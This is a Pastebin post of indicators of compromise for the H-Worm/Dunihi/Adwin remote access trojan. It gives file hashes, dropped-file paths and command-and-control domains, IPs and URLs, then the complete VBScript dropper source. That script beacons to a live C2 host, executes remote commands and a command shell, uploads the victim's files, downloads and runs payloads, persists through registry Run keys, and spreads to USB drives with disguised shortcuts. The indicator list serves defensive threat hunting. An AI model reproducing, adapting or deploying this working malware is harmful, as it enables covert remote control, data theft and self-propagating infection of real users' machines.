API tools faq
paste
G0dR4p3

Dunihi_Adwin_RAT_IOCs_21-01-2019

G0dR4p3
Jan 21st, 2019
1,042
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.04 KB | None | 0 0
raw download clone embed print report
  1. #H-Worm #Dunihi #Adwin #RAT
  2. ---------------------------------
  3. 21-01-2019 IOC's
  4. ---------------------------------
  5. Main object- "9ed6f79853efcec2c6e17bb7def042f2b4373519b56f7b437ed85cf8d260b7cc.bin.gz"
  6. sha256 8f8e8b167a3a34c8bf4a99e2d0db589e6608a3789a7fc7deb3dfdc785de1e9cc
  7. sha1 d573a1d7482f9d8ad1b85725e1cc58c2034b3fdf
  8. md5 4a596594f3efc17edf98ad162f87e0cf
  9. Dropped executable file
  10. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\awt.dll e5d4fc7d47a38a389884af1ea5f06f7c61c5cde6afc154a23a3cb5a127da1e34
  11. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\decora_sse.dll adf4e9ce0866ff16a16f626cfc62355fb81212b1e7c95dd908e3644f88b77e91
  12. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dt_shmem.dll c417390f681276ec0d55d81a91b87eae75ca245045f5c23e9b43550b708fb1a6
  13. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\deploy.dll bff79fb05667992cc2bda9bae6e5a301baf553042f952203641ccd7e1fc4552d
  14. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\eula.dll dec4f2f32edc45f70e7119c9e52c4cef44bb9aa627dbec1ee70f61d37468556b
  15. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\glass.dll a92df0e1f93e29fae427da766d9b91bda4b421e6ab86aeb9cdd060b218028d35
  16. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\fontmanager.dll 20bef5bcd523cff21bad585af91d1c913d5535a6b20ac70f5f3d8dafb2f90f25
  17. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\fxplugins.dll 1c78673777d1d48bf9e1e247bc64231817dccec4b08cc5e8c7a7fc5ae1f32501
  18. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dcpr.dll 80111e1d706741f5ef7f661835c3aa46664666425aa1b5f93103410f2bee1213
  19. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dt_socket.dll f0fd0268d6e410c05e7ee71ad9c96744cd5e4a97329f608041d7078faee24ed0
  20. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\bci.dll 7945365a3cd40d043dae47849e6645675166920958300e64dea76a865bc479af
  21. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcp120.dll 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
  22. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\klist.exe 298d8e2730a3dbe942ebe0379f7303bb2872fd7f05746851e47ed7588f541477
  23. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\keytool.exe 8c40c13f83ea7c95b441548a455b57edac019b1cbfd6c6a068ddad33a6476ff1
  24. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ktab.exe e89fe9520bcedbba20b5773598fb15e90dc828be7691adaa9d887ca585046aad
  25. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcr120.dll 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
  26. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\mlib_image.dll bb13a4ea915965aca971da50d9b90cbc0a32c99900eb585c6e9e12232b448fef
  27. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\lcms.dll e179ace7a6d6cffeb7540d67ef56d86a96cd16c421154b0a8b499722a4e957d9
  28. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\management.dll 035121aee1e7f257c582837e1a0bd2e240bc1d1a791354a803e5fa165be22d87
  29. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcr100.dll 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
  30. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\kinit.exe 7cc34a5423bd3fc9fa63d20ebece4103e22e4360df5b9caa2b461069dac77f4d
  31. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jaas_nt.dll e700d076614943e138b69f4a1f177914225ca35b93fed8b43bc4a86cfd87c59c
  32. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\hprof.dll cc82beaa275f4ed4c33b694154bebc5fd097ada50072201d250aed3f269a41b6
  33. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\net.dll 6d9bd64084180b7f1b7aa4902372879dc0400905856ac0c229ad33218f3257f1
  34. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\nio.dll fb537564d240ac9b730941b5c0966209a5857e4d3ec0582ba0443fe391c74294
  35. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\policytool.exe d81308da68136fd421eb56fa2b586ec6801ccf0827d85f495227e6d6c40fc69e
  36. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\npt.dll 9145cb3b7fe40237e5c980404ade4c862d48e2d644aeba0006ec3a6f3e9505b5
  37. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\pack200.exe 3047b67b36aee78b669fdedfe423e750b125837d92abcdc06983c34c65db71fc
  38. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\orbd.exe 0f8cae56647464d75d2530cc9f7205c69911fced55e43a39d86ff4d435a018ed
  39. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_common.dll 5264316be4820cbc940e0c277698e6f95ec99a52023e5ef85c3fbe624b45cdaf
  40. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\glib-lite.dll 465541ef4e9337108b375984c23f5d31e6c060fed16820bb9bc5af79a2109eac
  41. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_sw.dll 3f976b7efc9fe59abfe0bcde0d3b5af1cf133c64ad1508cb4a00cf2c104f5e81
  42. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\gstreamer-lite.dll 379a14d561afeb364f8902c0b5193da229882c6273f2793339e1ad682af516f4
  43. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_d3d.dll f9108ac2555dbc5a6b43cc9504394089be60eae4127397dc651e06b3e7585b00
  44. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\j2pkcs11.dll 91b6e445f5b4510c9d66641b1eed925f54dc2e84f3ddb0ff16ed5b0ac4bdc977
  45. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jabswitch.exe a764db727ed6ec056ffe163dbb83db0ad0bd15b83181288c3afcd17a35e7d587
  46. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java.exe df24b51772ff4959e9bbfe481f72f0e88ba6e7c031d60edb3b1a47c69f69a6d0
  47. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javacpl.exe e7521e54f241e99bb5f7f2de1cd2fc49f3980dc43eb6c5b8fa251178f03616ef
  48. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll 33fe38e43821c7e7d3b46317fab571926174492affd576f6ecd06bffe7a7c1b7
  49. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\j2pcsc.dll 7a9f32ecba3dcaeb653293780812969e2534da7b8e652a24e56271cd088c7a36
  50. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll ed68df1e549a092674259b1f806a31839ca426572020a7dbe0c46e492b272ec9
  51. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javacpl.cpl e3259bb7ef907c0bb74e192e40e57fdf96c903bbc580975348dfef42839669ff
  52. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_font.dll eada27806ccbf4d015f35f369b6880ef3dcc2eaa3b1ca89546fbdba8b05d9b5c
  53. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java.dll 30a048a35865ca5bcea35ebecf7f01f08e8d20b0c4a3e9e0132540815eda1d89
  54. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java-rmi.exe 2ba8cd9a3757ecf0b8b7de612d7f827de73f7e9da114b1979fe9d429a46f8109
  55. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\instrument.dll 1a1d2c51b3db4507e4a4ad3e5afb6728e69acf9905d3df7c9dc5adbe83f7e96e
  56. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java_crw_demo.dll b34e72996d2c1a9b74a932c6259256b9001b73b3e7ef8c484afb61ff2517fba3
  57. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jawt.dll b11633c87ac49873d1e8ef5bcf9335dbe0579f483b5c745c0034f79b3fd0ae8c
  58. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jfxmedia.dll e62ec519aff414c1a81aeeb4cbf6de348b3b52ae527f14cedd42449e61fb1548
  59. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll 8019cd10ef1a1ddae179364934d1a0304cfcfc67be2dd7bca4ee8def93a89ef4
  60. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javaw.exe 11054aa4170990ad1d345a2caf15285f3157e4bf240015cc20431b7373a52fc2
  61. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javaws.exe 3514c54f5d552b2cb64b9e2f8d8c5f65807e1d49fe82689a16f6a3e7521fb437
  62. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_iio.dll e880cd6207c687437dd2ca60008ea375bd99b1c07075674cad1052f41b631a97
  63. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jfr.dll 28da2d3e61a12408b8d9f86398f9c78f551e48404bd2c7bdccd8cbd74ed5e5a3
  64. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jdwp.dll f9a0e87300c8d094bb45834dd128e70a49d6d5d2cef20133411a769c01195c04
  65. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2launcher.exe d8e40564694d5a2fdd85ab5345d8589e637e387d59160a74737832670da01597
  66. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jjs.exe c4916ed2eefc2ae2394625691f5550142eda6cb33e5e713d1e203b76b2141509
  67. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2iexp.dll 5cd202cd92f33cbad11898331dec0791bf0bccf8ddf22849942debde007c3317
  68. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\rmid.exe 6513c40184d496e86e34e327c960b06d20900c3092084a708d890f5376c43cf5
  69. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jpeg.dll 8cf3344453c02bf21ff8c79a6189f25617ca38cee2632766d0aa4ee07277bc25
  70. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jli.dll 45c6aa5006ebaf8ab63f26134f2753bf4f20497942de58bc734e437e2d0f32f6
  71. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\resource.dll 15b4fdfe5ddb1820ddc468ac5d0e65045ca6aaea21d3a5a66ecaa8fc1ce48835
  72. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\kcms.dll 0ecd837ae93404f0aacfa6efc20f3c3ce6d1ae683e60a1c8873f07bfc8f93dc4
  73. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2ssv.dll e5328bcaec7fdba85097c04d5f4f35f648753b3378fb1d9ee6ce6965b9562e90
  74. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2native.dll f5faf9f49ca7f199f572e4227896ae839596cc9f6039875f3fa3a0eaddc40084
  75. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsoundds.dll b534c43f203c5502e43a5d0fdbfbd9422de342aade635009fab791eb82f3c020
  76. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\splashscreen.dll a6ea1b705acdda1bb3cd1c3cdcbfe7c86c81654537db8b48f65a781578ffbd77
  77. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\verify.dll 266d7992f7518b7cda33ba5251b0636b00ee13e6b17021311dcc1ba4dd2fc705
  78. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ssv.dll 5eb2d05ffc733e7ec63cb271201f87c7724793e5b92b875551ced1cebb505f3f
  79. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsound.dll 5303366d9447a7610bd971339f27333767d399fca0a3f01154b082d47bd0a46e
  80. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ssvagent.exe 4ada2d738b490cc63f3c18f151239dfde615af8a4eaf44b8021642ff9a25b8f2
  81. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\unpack200.exe a6316854fe790d22e6264ee3abc3be49686e6e36299c9718be9a20bb3e9fb185
  82. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\unpack.dll 2864b031237c6a68eedab256732e43558b5741ae4f68a07a068438469ad907d9
  83. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\servertool.exe bbe145615886dbb3f4ada7617d1a15fe2aee6cea5dbe34e9c216d1bde1121891
  84. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\zip.dll 9a7251883229ccc36859b02894b541a369c2426a9b5cbdc7e8a10db36f13451e
  85. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsdt.dll fe5d22121d6a683bb87b362da85cabf8aead1c171d347d0a16da64c74dd8a3bc
  86. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\t2k.dll d66f567fc2a33434063731832719cad75418c619dd30dcf6c339d2d3da32c7bb
  87. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll 699e5ff6df1060df61a32e99c8fc52837f40f774bfa88136af10036f4dd4a578
  88. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\tnameserv.exe 9f37d44545726fb5aeb03285d3866266322b833cd1a1fde340497c7d9358f775
  89. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\sunmscapi.dll 9c235bbfa97e6a8fc7e09a4ac12f84c8ed8855998410e96dd44e1b64ef951a80
  90. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll 161f737f9c90e67f0fb80e7cd9d6823f83bdd1d971108faa99c6088c278a4f2a
  91. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\wsdetect.dll a78345586e443e0adc6554951946ad874f61ba2ff724fa8121df546a4b21df4a
  92. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\rmiregistry.exe ba2d5038501cf3f3a31616a122f6cd2554d13219e717ef89c6aa1a07eb1cc145
  93. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\sunec.dll 23b40cf8e64e1a262ef9ff5b9e01246c082eeaa6039b4b05f92e1bd536bd7166
  94. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\client\jvm.dll 156afc715e865695ddf69d4a7db5fea2023b39748febfd86add15e9498c26639
  95. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll adaaa9037be30c708865a6627df9c0e43acf93d100469e5fdf83f632d2fe1829
  96. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll 62248d7ab742e200996bf87433b4e8478e4d8bcfbc0a2ee7cbe3a5a62f6268c3
  97. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll d1deaa4b7feebfeed58eda969c9fb9bc5791ad7e67f47c596280375cbda3f46f
  98. sha256 C:\Users\admin\AppData\Local\Temp\Windows8381702355763314501.dll a6be5be2d16a24430c795faa7ab7cc7826ed24d6d4bc74ad33da5c2ed0c793d0
  99. DNS requests
  100. domain freshguys.ddnsking.com
  101. domain xtkd.ddns.net
  102. Connections
  103. ip 194.5.99.53
  104. ip 113.11.252.97
  105. HTTP/HTTPS requests
  106. url http://freshguys.ddnsking.com:5674/is-ready
  107. url http://xtkd.ddns.net:3233/is-ready
  108. url http://freshguys.ddnsking.com:5674/is-sending%3C%7C%3EC:/Users/Business/Desktop/adk.jar
  109. -------------------------------------------------------------------------------------------------------------
  110. [1st .VBS dropper]
  111. -------------------------------------------------------------------------------------------------------------
  112. [Dunihi]
  113. 'pashinta
  114. host = "freshguys.ddnsking.com"
  115. port = 5674
  116. installdir = "%temp%"
  117. lnkfile = false
  118. lnkfolder = false
  119.  
  120.  
  121. dim shellobj
  122. set shellobj = wscript.createobject("wscript.shell")
  123. dim filesystemobj
  124. set filesystemobj = createobject("scripting.filesystemobject")
  125. dim httpobj
  126. set httpobj = createobject("msxml2.xmlhttp")
  127.  
  128.  
  129. installname = wscript.scriptname
  130. startup = shellobj.specialfolders ("startup") & "\"
  131. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  132. if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  133. spliter = "<" & "|" & ">"
  134. sleep = 5000
  135. dim response
  136. dim cmd
  137. dim param
  138. info = ""
  139. usbspreading = ""
  140. startdate = ""
  141. dim oneonce
  142.  
  143. on error resume next
  144.  
  145.  
  146. instance
  147. while true
  148.  
  149. install
  150.  
  151. response = ""
  152. response = post ("is-ready","")
  153. cmd = split (response,spliter)
  154. select case cmd (0)
  155. case "excecute"
  156. param = cmd (1)
  157. execute param
  158. case "update"
  159. param = cmd (1)
  160. oneonce.close
  161. set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
  162. oneonce.write param
  163. oneonce.close
  164. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  165. wscript.quit
  166. case "uninstall"
  167. uninstall
  168. case "send"
  169. download cmd (1),cmd (2)
  170. case "site-send"
  171. sitedownloader cmd (1),cmd (2)
  172. case "recv"
  173. param = cmd (1)
  174. upload (param)
  175. case "enum-driver"
  176. post "is-enum-driver",enumdriver
  177. case "enum-faf"
  178. param = cmd (1)
  179. post "is-enum-faf",enumfaf (param)
  180. case "enum-process"
  181. post "is-enum-process",enumprocess
  182. case "cmd-shell"
  183. param = cmd (1)
  184. post "is-cmd-shell",cmdshell (param)
  185. case "delete"
  186. param = cmd (1)
  187. deletefaf (param)
  188. case "exit-process"
  189. param = cmd (1)
  190. exitprocess (param)
  191. case "sleep"
  192. param = cmd (1)
  193. sleep = eval (param)
  194. end select
  195.  
  196. wscript.sleep sleep
  197.  
  198. wend
  199.  
  200.  
  201. sub install
  202. on error resume next
  203. dim lnkobj
  204. dim filename
  205. dim foldername
  206. dim fileicon
  207. dim foldericon
  208.  
  209. upstart
  210. for each drive in filesystemobj.drives
  211.  
  212. if drive.isready = true then
  213. if drive.freespace > 0 then
  214. if drive.drivetype = 1 then
  215. filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  216. if filesystemobj.fileexists (drive.path & "\" & installname) then
  217. filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
  218. end if
  219. for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  220. if not lnkfile then exit for
  221. if instr (file.name,".") then
  222. if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  223. file.attributes = 2+4
  224. if ucase (file.name) <> ucase (installname) then
  225. filename = split(file.name,".")
  226. set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
  227. lnkobj.windowstyle = 7
  228. lnkobj.targetpath = "cmd.exe"
  229. lnkobj.workingdirectory = ""
  230. lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  231. fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  232. if instr (fileicon,",") = 0 then
  233. lnkobj.iconlocation = file.path
  234. else
  235. lnkobj.iconlocation = fileicon
  236. end if
  237. lnkobj.save()
  238. end if
  239. end if
  240. end if
  241. next
  242. for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  243. if not lnkfolder then exit for
  244. folder.attributes = 2+4
  245. foldername = folder.name
  246. set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
  247. lnkobj.windowstyle = 7
  248. lnkobj.targetpath = "cmd.exe"
  249. lnkobj.workingdirectory = ""
  250. lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  251. foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  252. if instr (foldericon,",") = 0 then
  253. lnkobj.iconlocation = folder.path
  254. else
  255. lnkobj.iconlocation = foldericon
  256. end if
  257. lnkobj.save()
  258. next
  259. end If
  260. end If
  261. end if
  262. next
  263. err.clear
  264. end sub
  265.  
  266. sub uninstall
  267. on error resume next
  268. dim filename
  269. dim foldername
  270.  
  271. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  272. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  273. filesystemobj.deletefile startup & installname ,true
  274. filesystemobj.deletefile wscript.scriptfullname ,true
  275.  
  276. for each drive in filesystemobj.drives
  277. if drive.isready = true then
  278. if drive.freespace > 0 then
  279. if drive.drivetype = 1 then
  280. for each file in filesystemobj.getfolder ( drive.path & "\").files
  281. on error resume next
  282. if instr (file.name,".") then
  283. if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  284. file.attributes = 0
  285. if ucase (file.name) <> ucase (installname) then
  286. filename = split(file.name,".")
  287. filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  288. else
  289. filesystemobj.deletefile (drive.path & "\" & file.name)
  290. end If
  291. else
  292. filesystemobj.deletefile (file.path)
  293. end if
  294. end if
  295. next
  296. for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  297. folder.attributes = 0
  298. next
  299. end if
  300. end if
  301. end if
  302. next
  303. wscript.quit
  304. end sub
  305.  
  306. function post (cmd ,param)
  307.  
  308. post = param
  309. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  310. httpobj.setrequestheader "user-agent:",information
  311. httpobj.send param
  312. post = httpobj.responsetext
  313. end function
  314.  
  315. function information
  316. on error resume next
  317. if inf = "" then
  318. inf = hwid & spliter
  319. inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
  320. inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
  321.  
  322. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  323. set os = root.execquery ("select * from win32_operatingsystem")
  324. for each osinfo in os
  325. inf = inf & osinfo.caption & spliter
  326. exit for
  327. next
  328. inf = inf & "plus" & spliter
  329. inf = inf & security & spliter
  330. inf = inf & usbspreading
  331. information = inf
  332. else
  333. information = inf
  334. end if
  335. end function
  336.  
  337.  
  338. sub upstart ()
  339. on error resume Next
  340.  
  341. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  342. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  343. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  344. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  345.  
  346. end sub
  347.  
  348.  
  349. function hwid
  350. on error resume next
  351.  
  352. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  353. set disks = root.execquery ("select * from win32_logicaldisk")
  354. for each disk in disks
  355. if disk.volumeserialnumber <> "" then
  356. hwid = disk.volumeserialnumber
  357. exit for
  358. end if
  359. next
  360. end function
  361.  
  362.  
  363. function security
  364. on error resume next
  365.  
  366. security = ""
  367.  
  368. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  369. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  370. for each objitem in colitems
  371. versionstr = split (objitem.version,".")
  372. next
  373. versionstr = split (colitems.version,".")
  374. osversion = versionstr (0) & "."
  375. for x = 1 to ubound (versionstr)
  376. osversion = osversion & versionstr (i)
  377. next
  378. osversion = eval (osversion)
  379. if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  380.  
  381. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  382. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  383.  
  384. for each objantivirus in colantivirus
  385. security = security & objantivirus.displayname & " ."
  386. next
  387. if security = "" then security = "nan-av"
  388. end function
  389.  
  390.  
  391. function instance
  392. on error resume next
  393.  
  394. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  395. if usbspreading = "" then
  396. if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
  397. usbspreading = "true - " & date
  398. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
  399. else
  400. usbspreading = "false - " & date
  401. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
  402.  
  403. end if
  404. end If
  405.  
  406.  
  407.  
  408. upstart
  409. set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
  410. set installfullnameshort = filesystemobj.getfile (installdir & installname)
  411. if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  412. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  413. wscript.quit
  414. end If
  415. err.clear
  416. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  417. if err.number > 0 then wscript.quit
  418. end function
  419.  
  420.  
  421. sub sitedownloader (fileurl,filename)
  422.  
  423. strlink = fileurl
  424. strsaveto = installdir & filename
  425. set objhttpdownload = createobject("msxml2.xmlhttp" )
  426. objhttpdownload.open "get", strlink, false
  427. objhttpdownload.send
  428.  
  429. set objfsodownload = createobject ("scripting.filesystemobject")
  430. if objfsodownload.fileexists (strsaveto) then
  431. objfsodownload.deletefile (strsaveto)
  432. end if
  433.  
  434. if objhttpdownload.status = 200 then
  435. dim objstreamdownload
  436. set objstreamdownload = createobject("adodb.stream")
  437. with objstreamdownload
  438. .type = 1
  439. .open
  440. .write objhttpdownload.responsebody
  441. .savetofile strsaveto
  442. .close
  443. end with
  444. set objstreamdownload = nothing
  445. end if
  446. if objfsodownload.fileexists(strsaveto) then
  447. shellobj.run objfsodownload.getfile (strsaveto).shortpath
  448. end if
  449. end sub
  450.  
  451. sub download (fileurl,filedir)
  452.  
  453. if filedir = "" then
  454. filedir = installdir
  455. end if
  456.  
  457. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  458. set objhttpdownload = createobject("msxml2.xmlhttp")
  459. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  460. objhttpdownload.send ""
  461.  
  462. set objfsodownload = createobject ("scripting.filesystemobject")
  463. if objfsodownload.fileexists (strsaveto) then
  464. objfsodownload.deletefile (strsaveto)
  465. end if
  466. if objhttpdownload.status = 200 then
  467. dim objstreamdownload
  468. set objstreamdownload = createobject("adodb.stream")
  469. with objstreamdownload
  470. .type = 1
  471. .open
  472. .write objhttpdownload.responsebody
  473. .savetofile strsaveto
  474. .close
  475. end with
  476. set objstreamdownload = nothing
  477. end if
  478. if objfsodownload.fileexists(strsaveto) then
  479. shellobj.run objfsodownload.getfile (strsaveto).shortpath
  480. end if
  481. end sub
  482.  
  483.  
  484. function upload (fileurl)
  485.  
  486. dim httpobj,objstreamuploade,buffer
  487. set objstreamuploade = createobject("adodb.stream")
  488. with objstreamuploade
  489. .type = 1
  490. .open
  491. .loadfromfile fileurl
  492. buffer = .read
  493. .close
  494. end with
  495. set objstreamdownload = nothing
  496. set httpobj = createobject("msxml2.xmlhttp")
  497. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  498. httpobj.send buffer
  499. end function
  500.  
  501.  
  502. function enumdriver ()
  503.  
  504. for each drive in filesystemobj.drives
  505. if drive.isready = true then
  506. enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  507. end if
  508. next
  509. end Function
  510.  
  511. function enumfaf (enumdir)
  512.  
  513. enumfaf = enumdir & spliter
  514. for each folder in filesystemobj.getfolder (enumdir).subfolders
  515. enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  516. next
  517.  
  518. for each file in filesystemobj.getfolder (enumdir).files
  519. enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
  520.  
  521. next
  522. end function
  523.  
  524.  
  525. function enumprocess ()
  526.  
  527. on error resume next
  528.  
  529. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  530. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  531.  
  532. dim objitem
  533. for each objitem in colitems
  534. enumprocess = enumprocess & objitem.name & "|"
  535. enumprocess = enumprocess & objitem.processid & "|"
  536. enumprocess = enumprocess & objitem.executablepath & spliter
  537. next
  538. end function
  539.  
  540. sub exitprocess (pid)
  541. on error resume next
  542.  
  543. shellobj.run "taskkill /F /T /PID " & pid,7,true
  544. end sub
  545.  
  546. sub deletefaf (url)
  547. on error resume next
  548.  
  549. filesystemobj.deletefile url
  550. filesystemobj.deletefolder url
  551.  
  552. end sub
  553.  
